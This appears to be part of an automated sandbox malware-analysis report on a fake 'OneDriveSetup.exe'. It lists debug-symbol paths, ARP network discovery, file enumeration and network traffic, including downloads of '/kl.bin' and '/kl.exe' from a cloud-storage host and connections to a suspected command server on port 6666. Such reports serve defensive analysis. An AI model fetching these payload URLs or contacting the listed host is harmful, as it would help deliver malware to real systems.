                Source: Binary string: E:\A\_work\1795\s\corefx\bin\obj\Windows_NT.AnyCPU.Release\System.Runtime.InteropServices.RuntimeInformation\net462\System.Runtime.InteropServices.RuntimeInformation.pdbxE source: bin.exe, 00000017.00000003.1607032792.000000000526F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Resources.Writer\4.0.2.0\System.Resources.Writer.pdbl( source: bin.exe, 00000017.00000003.1603538546.0000000002738000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Reflection\4.1.2.0\System.Reflection.pdbH,b, T,_CorDllMainmscoree.dll source: bin.exe, 00000017.00000003.1601628106.000000000273C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.Numerics\4.0.1.0\System.Runtime.Numerics.pdb|( source: bin.exe, 00000017.00000003.1610160975.0000000002737000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\projects\wpfanimatedgif\WpfAnimatedGif\obj\Release\net40\WpfAnimatedGif.pdbSHA256 source: bin.exe, 00000017.00000003.1646939143.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Text.RegularExpressions\4.1.1.0\System.Text.RegularExpressions.pdb source: bin.exe, 00000017.00000003.1629944717.000000000273D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.Ping\4.0.2.0\System.Net.Ping.pdb source: bin.exe, 00000017.00000003.1595260385.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.ServiceModel.Duplex.Facade/Release/net461/System.ServiceModel.Duplex.pdb source: bin.exe, 00000017.00000003.1624001905.0000000002731000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.Contracts\4.0.1.0\System.Diagnostics.Contracts.pdb source: bin.exe, 00000017.00000003.1566361355.0000000002733000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/Microsoft.Bcl.AsyncInterfaces/net461-Release/Microsoft.Bcl.AsyncInterfaces.pdbSHA256 source: bin.exe, 00000017.00000003.1532085148.0000000002732000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: WebView2Loader.dll.pdb source: bin.exe, 00000017.00000003.1678131607.0000000002732000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/Microsoft.Win32.Registry.AccessControl/net461-windows-Release/Microsoft.Win32.Registry.AccessControl.pdb source: bin.exe, 00000017.00000003.1536976844.0000000002731000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\MdXaml\artifacts\obj\MdXaml\Release\net45\MdXaml.pdbSHA256/T source: bin.exe, 00000017.00000003.1527350811.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: netstandard.pdb.mdb source: bin.exe, 00000017.00000003.1540649267.0000000002736000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1508105244.0000000002732000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Cryptography.Primitives\4.0.2.0\System.Security.Cryptography.Primitives.pdb source: bin.exe, 00000017.00000003.1619337854.0000000002734000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Diagnostics.EventLog/net461-Release/System.Diagnostics.EventLog.pdbSHA256~ source: bin.exe, 00000017.00000003.1567675313.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\build\xra_common\webview_3497\Release_tjfuyun\webview.pdb source: OneDriveSetup.exe, 00000000.00000003.1283662879.000001F7956FB000.00000004.00000020.00020000.00000000.sdmp, Agghosts.exe, 00000009.00000002.3066025850.000000000087F000.00000002.00000001.01000000.0000000B.sdmp, Agghosts.exe, 00000018.00000002.3065288603.000000000087F000.00000002.00000001.01000000.0000000B.sdmp
                Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.Security.SecureString/netfx\System.Security.SecureString.pdbf) source: bin.exe, 00000017.00000003.1623511501.000000000273E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.InteropServices\4.1.2.0\System.Runtime.InteropServices.pdbH5b5 T5_CorDllMainmscoree.dll source: bin.exe, 00000017.00000003.1607566852.000000000526F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.TextWriterTraceListener\4.0.2.0\System.Diagnostics.TextWriterTraceListener.pdb source: bin.exe, 00000017.00000003.1571122939.0000000002739000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Resources.Reader\4.0.2.0\System.Resources.Reader.pdbl( source: bin.exe, 00000017.00000003.1602379822.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Web.Services.Description/Release/net461/System.Web.Services.Description.pdb source: bin.exe, 00000017.00000003.1639573458.0000000002739000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\sources\cecil\symbols\pdb\obj\Release\net40\Mono.Cecil.Pdb.pdbSHA256 source: bin.exe, 00000017.00000003.1539281217.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.IsolatedStorage\4.0.2.0\System.IO.IsolatedStorage.pdb source: bin.exe, 00000017.00000003.1581060305.000000000273C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.Xml.XPath.XDocument/netfx\System.Xml.XPath.XDocument.pdb source: bin.exe, 00000017.00000003.1641668329.000000000273E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Data.Odbc/net461-windows-Release/System.Data.Odbc.pdb source: bin.exe, 00000017.00000003.1564522155.0000000002737000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: Extract: Mono.Cecil.Pdb.dll... 100% source: bin.exe, 00000017.00000003.1684160118.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1682444557.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1683307184.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1666138359.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1669868707.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1678000606.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1612762848.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1678751411.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1676498928.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1568171623.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1885521177.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1561026900.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1675026731.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1570947440.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1612052281.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1609523671.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1616041410.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1664820906.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1605841488.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1547261671.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1661756361.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1959010557.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1604051077.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1603379584.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1666893107.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1602218207.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1606874509.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1665493869.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1619189971.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1673266845.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1672033946.00000000
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Cryptography.X509Certificates\4.1.2.0\System.Security.Cryptography.X509Certificates.pdb source: bin.exe, 00000017.00000003.1620645331.0000000002734000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Linq.Expressions\4.1.2.0\System.Linq.Expressions.pdb source: bin.exe, 00000017.00000003.1589104804.0000000002738000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\projects\sqlite-net-extensions\SQLiteNetExtensionsAsync\obj\Release\netstandard1.1\SQLiteNetExtensionsAsync.pdb source: bin.exe, 00000017.00000003.1545410871.0000000002732000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Cryptography.Csp\4.0.2.0\System.Security.Cryptography.Csp.pdb source: bin.exe, 00000017.00000003.1617348748.000000000273E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\a\1\s\third_party\edge_webview2\win\wpf_control\Microsoft.Web.WebView2.Wpf\obj\release\net45\Microsoft.Web.WebView2.Wpf.pdb source: bin.exe, 00000017.00000003.1535471188.000000000273E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.Xml/net461-windows-Release/System.Security.Cryptography.Xml.pdbSHA256 source: bin.exe, 00000017.00000003.1621198141.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.Requests\4.0.11.0\System.Net.Requests.pdbX)r) d)_CorDllMainmscoree.dll source: bin.exe, 00000017.00000003.1596242728.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: c:\Users\Todd\Source\Repos\DeltaCompressionDotNet\DeltaCompressionDotNet\obj\Release\DeltaCompressionDotNet.pdb source: bin.exe, 00000017.00000003.1512120926.0000000002732000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\156\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Buffers\netfx\System.Buffers.pdb source: bin.exe, 00000017.00000003.1552159132.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\a\1\s\SDK\AppCenterCrashes\Microsoft.AppCenter.Crashes.WindowsDesktop\obj\Release\net461\Microsoft.AppCenter.Crashes.pdbSHA256, source: bin.exe, 00000017.00000003.1531102979.0000000002732000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\156\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Threading.Tasks.Extensions\netfx\System.Threading.Tasks.Extensions.pdb source: bin.exe, 00000017.00000003.1631518950.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Cryptography.Encoding\4.0.2.0\System.Security.Cryptography.Encoding.pdbT)n) `)_CorDllMainmscoree.dll source: bin.exe, 00000017.00000003.1617972564.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.AppContext\4.1.2.0\System.AppContext.pdb<(V( H(_CorDllMainmscoree.dll source: bin.exe, 00000017.00000003.1551600625.0000000002737000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.Process\4.1.2.0\System.Diagnostics.Process.pdb source: bin.exe, 00000017.00000003.1569651251.000000000273E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.ServiceModel.Primitives.Facade/Release/net461/System.ServiceModel.Primitives.pdb source: bin.exe, 00000017.00000003.1625556136.0000000002734000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\WorkShop\WebSocket4Net\WebSocket4Net\obj\Release\WebSocket4Net.pdb* source: bin.exe, 00000017.00000003.1646188460.000000000273A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.ServiceProcess.ServiceController/net461-windows-Release/System.ServiceProcess.ServiceController.pdbSHA256 source: bin.exe, 00000017.00000003.1627316997.0000000002730000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.Cng/net462-Windows_NT-Release/System.Security.Cryptography.Cng.pdbSHA256,C+U7 source: bin.exe, 00000017.00000003.1616704287.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\WorkShop\SuperSocket.ClientEngine\obj\Release\SuperSocket.ClientEngine.pdbR source: bin.exe, 00000017.00000003.1551101243.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Linq.Queryable\4.0.1.0\System.Linq.Queryable.pdb source: bin.exe, 00000017.00000003.1589953846.0000000002730000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: bin.exe, 00000017.00000003.1541597025.0000000002734000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000037.00000002.1890859307.0000000005F22000.00000002.00000001.01000000.0000001E.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Xml.XmlDocument\4.0.3.0\System.Xml.XmlDocument.pdb source: bin.exe, 00000017.00000003.1642655283.0000000002734000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Threading.Thread\4.0.2.0\System.Threading.Thread.pdb source: bin.exe, 00000017.00000003.1633728741.000000000273A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\projects\wpfanimatedgif\WpfAnimatedGif\obj\Release\net40\WpfAnimatedGif.pdb source: bin.exe, 00000017.00000003.1646939143.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.CodeDom/net461-Release/System.CodeDom.pdb source: bin.exe, 00000017.00000003.1552758930.0000000002731000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Diagnostics.PerformanceCounter/net461-Release/System.Diagnostics.PerformanceCounter.pdb source: bin.exe, 00000017.00000003.1569113224.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\Microsoft.Win32.Primitives\4.0.3.0\Microsoft.Win32.Primitives.pdb source: bin.exe, 00000017.00000003.1536326659.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\projects\ipnetwork\src\System.Net.IPNetwork\obj\release\net46\System.Net.IPNetwork.pdb source: bin.exe, 00000017.00000003.1593483290.0000000002733000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Claims\4.0.3.0\System.Security.Claims.pdb source: bin.exe, 00000017.00000003.1615509654.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Text.Encoding\4.0.11.0\System.Text.Encoding.pdb source: bin.exe, 00000017.00000003.1629430171.0000000002738000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\Code\SVGImage\Source\SVGImage\obj\Release\net46\SVGImage.pdb source: bin.exe, 00000017.00000003.1548626041.0000000002732000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Data.SqlClient/net461-Windows_NT-Release/System.Data.SqlClient.pdb source: bin.exe, 00000017.00000003.1565839959.0000000002731000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\sources\cecil\symbols\mdb\obj\Release\net40\Mono.Cecil.Mdb.pdb source: bin.exe, 00000017.00000003.1538662280.0000000002733000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.Pkcs/net461-windows-Release/System.Security.Cryptography.Pkcs.pdb source: bin.exe, 00000017.00000003.1618601938.0000000002738000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\projects\sqlite-net-extensions\SQLiteNetExtensions\obj\Release\SQLiteNetExtensions.pdb source: bin.exe, 00000017.00000003.1544903906.0000000002731000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\39\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.ValueTuple\netfx\System.ValueTuple.pdb source: bin.exe, 00000017.00000003.1639032226.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.FileSystem.Primitives\4.0.3.0\System.IO.FileSystem.Primitives.pdb source: bin.exe, 00000017.00000003.1579218741.0000000002731000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.FileVersionInfo\4.0.2.0\System.Diagnostics.FileVersionInfo.pdbp( source: bin.exe, 00000017.00000003.1568304896.000000000526F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\a\1\s\SDK\AppCenterAnalytics\Microsoft.AppCenter.Analytics.WindowsDesktop\obj\Release\net461\Microsoft.AppCenter.Analytics.pdb source: bin.exe, 00000017.00000003.1529710100.000000000273E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: c:\users\samuli\opt\tap-windows6-mattock\tapinstall\7600\objfre_wlh_amd64\amd64\tapinstall.pdbH source: bin.exe, 00000017.00000003.1506130454.0000000002732000.00000004.00000020.00020000.00000000.sdmp, tapinstall.exe, 0000001D.00000000.1811026709.00007FF67B9D1000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 0000001D.00000002.1813119826.00007FF67B9D1000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 0000001F.00000002.1855324120.00007FF67B9D1000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 0000001F.00000000.1813487867.00007FF67B9D1000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 00000025.00000000.1856420036.00007FF67B9D1000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 00000025.00000002.1857742975.00007FF67B9D1000.00000020.00000001.01000000.00000017.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.Requests\4.0.11.0\System.Net.Requests.pdb source: bin.exe, 00000017.00000003.1596242728.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.IO.Compression/netfx\System.IO.Compression.pdb]W source: bin.exe, 00000017.00000003.1577151692.0000000002733000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/Microsoft.Win32.SystemEvents/net461-Release/Microsoft.Win32.SystemEvents.pdb source: bin.exe, 00000017.00000003.1538114528.000000000273D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.Extensions\4.1.2.0\System.Runtime.Extensions.pdb source: bin.exe, 00000017.00000003.1605485031.0000000002736000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.Net.Sockets/netfx\System.Net.Sockets.pdb source: bin.exe, 00000017.00000003.1597283206.000000000273D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Collections\4.0.11.0\System.Collections.pdb source: bin.exe, 00000017.00000003.1558254585.000000000273E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.WebSockets\4.0.2.0\System.Net.WebSockets.pdb source: bin.exe, 00000017.00000003.1598931157.0000000002731000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/Microsoft.Toolkit.Uwp.Notifications/obj/Release/net461/Microsoft.Toolkit.Uwp.Notifications.pdbSHA256 source: bin.exe, 00000017.00000003.1533776691.000000000273C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: F:\dbs\sh\odct\0201_092045\client\onedrive\Setup\standalone\exe\obj\amd64\OneDriveSetup.pdb source: OneDriveSetup.exe, 00000000.00000000.1201032034.00007FF6B514C000.00000002.00000001.01000000.00000003.sdmp, OneDriveSetup.exe, 00000000.00000002.1309600075.00007FF6B514C000.00000002.00000001.01000000.00000003.sdmp
                Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.Diagnostics.StackTrace/netfx\System.Diagnostics.StackTrace.pdb$.>. 0._CorDllMainmscoree.dll source: bin.exe, 00000017.00000003.1570344266.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.Serialization.Json\4.0.1.0\System.Runtime.Serialization.Json.pdb source: bin.exe, 00000017.00000003.1612215932.0000000002737000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.MemoryMappedFiles\4.0.2.0\System.IO.MemoryMappedFiles.pdb source: bin.exe, 00000017.00000003.1583783784.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Globalization.Calendars\4.0.3.0\System.Globalization.Calendars.pdb source: bin.exe, 00000017.00000003.1574773739.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.ServiceModel.Security.Facade/Release/net461/System.ServiceModel.Security.pdb source: bin.exe, 00000017.00000003.1626199430.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Diagnostics.EventLog/net461-Release/System.Diagnostics.EventLog.pdb source: bin.exe, 00000017.00000003.1567675313.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\a\1\s\SDK\AppCenter\Microsoft.AppCenter.WindowsDesktop\obj\Release\net461\Microsoft.AppCenter.pdbSHA256X7 source: bin.exe, 00000017.00000003.1531546889.0000000002730000.00000004.00000020.00020000.00000000.sdmp

                Spreading

                barindex
                Performs a network lookup / discovery via ARP
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ARP.EXE arp -a
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ARP.EXE arp -a
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_0066201D CloseHandle,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,CloseHandle,PathIsDirectoryW,PathFindFileNameW,FindFirstFileW,PathCombineW,FindNextFileW,9_2_0066201D
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_0066201D CloseHandle,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,CloseHandle,PathIsDirectoryW,PathFindFileNameW,FindFirstFileW,PathCombineW,FindNextFileW,9_2_0066201D
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_0066201D CloseHandle,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,CloseHandle,PathIsDirectoryW,PathFindFileNameW,FindFirstFileW,PathCombineW,FindNextFileW,9_2_0066201D
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_0066201D CloseHandle,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,CloseHandle,PathIsDirectoryW,PathFindFileNameW,FindFirstFileW,PathCombineW,FindNextFileW,9_2_0066201D
                Source: C:\Users\Public\Videos\bin.exeCode function: 23_2_00405C4D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,23_2_00405C4D
                Source: C:\Users\Public\Videos\bin.exeCode function: 23_2_0040689E FindFirstFileW,FindClose,23_2_0040689E
                Source: C:\Users\Public\Videos\bin.exeCode function: 23_2_00402930 FindFirstFileW,23_2_00402930
                Source: C:\Users\user\Desktop\OneDriveSetup.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeFile opened: C:\Users\userJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeFile opened: C:\Users\user\AppDataJump to behavior
                Source: global trafficTCP traffic: 192.168.2.4:49721 -> 143.92.56.59:6666
                Source: global trafficTCP traffic: 192.168.2.4:49740 -> 8.8.8.8:53
                Source: global trafficHTTP traffic detected: GET /kl.bin HTTP/1.1Host: aa-1348336590.cos.ap-hongkong.myqcloud.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /kl.exe HTTP/1.1Host: aa-1348336590.cos.ap-hongkong.myqcloud.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /logs?api-version=1.0.0 HTTP/1.1App-Secret: 5b3d0aea-eb78-41e4-bd41-80da14e98e58Install-ID: 336fab04-90f8-43c8-9867-f5969890c615Content-Type: application/json; charset=utf-8Host: in.appcenter.msContent-Length: 570Expect: 100-continueConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /logs?api-version=1.0.0 HTTP/1.1App-Secret: 5b3d0aea-eb78-41e4-bd41-80da14e98e58Install-ID: 336fab04-90f8-43c8-9867-f5969890c615Content-Type: application/json; charset=utf-8Host: in.appcenter.msContent-Length: 2055Expect: 100-continueConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /app/4fc436ef36f4026102d7?protocol=5&client=pusher-dotnet-client&version=1.1.2 HTTP/1.1Host: ws-ap1.pusher.comUpgrade: websocketConnection: UpgradeSec-WebSocket-Version: 13Sec-WebSocket-Key: Yzc2OWMzNWYtODlkMC00NQ==Origin: ws://ws-ap1.pusher.com
                Source: Joe Sandbox ViewIP Address: 183.60.146.66 183.60.146.66
                Source: Joe Sandbox ViewIP Address: 77.88.44.55 77.88.44.55
                Source: Joe Sandbox ViewIP Address: 23.98.101.155 23.98.101.155
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49714 -> 43.132.105.214:443
                Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49722 -> 43.132.105.214:443
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.baidu.comAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                Source: unknownTCP traffic detected without corresponding DNS query: 143.92.56.59
                Source: unknownTCP traffic detected without corresponding DNS query: 143.92.56.59
                Source: unknownTCP traffic detected without corresponding DNS query: 143.92.56.59
                Source: unknownTCP traffic detected without corresponding DNS query: 143.92.56.59
                Source: unknownTCP traffic detected without corresponding DNS query: 143.92.56.59
                Source: unknownTCP traffic detected without corresponding DNS query: 143.92.56.59
                Source: unknownTCP traffic detected without corresponding DNS query: 143.92.56.59
                Source: unknownTCP traffic detected without corresponding DNS query: 143.92.56.59
                Source: unknownTCP traffic detected without corresponding DNS query: 143.92.56.59
                Source: unknownTCP traffic detected without corresponding DNS query: 143.92.56.59
                Source: unknownTCP traffic detected without corresponding DNS query: 143.92.56.59
                Source: unknownTCP traffic detected without corresponding DNS query: 143.92.56.59
                Source: unknownTCP traffic detected without corresponding DNS query: 143.92.56.59
                Source: unknownTCP traffic detected without corresponding DNS query: 143.92.56.59
                Source: unknownTCP traffic detected without corresponding DNS query: 143.92.56.59
                Source: unknownTCP traffic detected without corresponding DNS query: 143.92.56.59
                Source: unknownTCP traffic detected without corresponding DNS query: 143.92.56.59
                Source: unknownTCP traffic detected without corresponding DNS query: 143.92.56.59
                Source: unknownTCP traffic detected without corresponding DNS query: 143.92.56.59
                Source: unknownTCP traffic detected without corresponding DNS query: 143.92.56.59
                Source: unknownTCP traffic detected without corresponding DNS query: 143.92.56.59
                Source: unknownTCP traffic detected without corresponding DNS query: 143.92.56.59
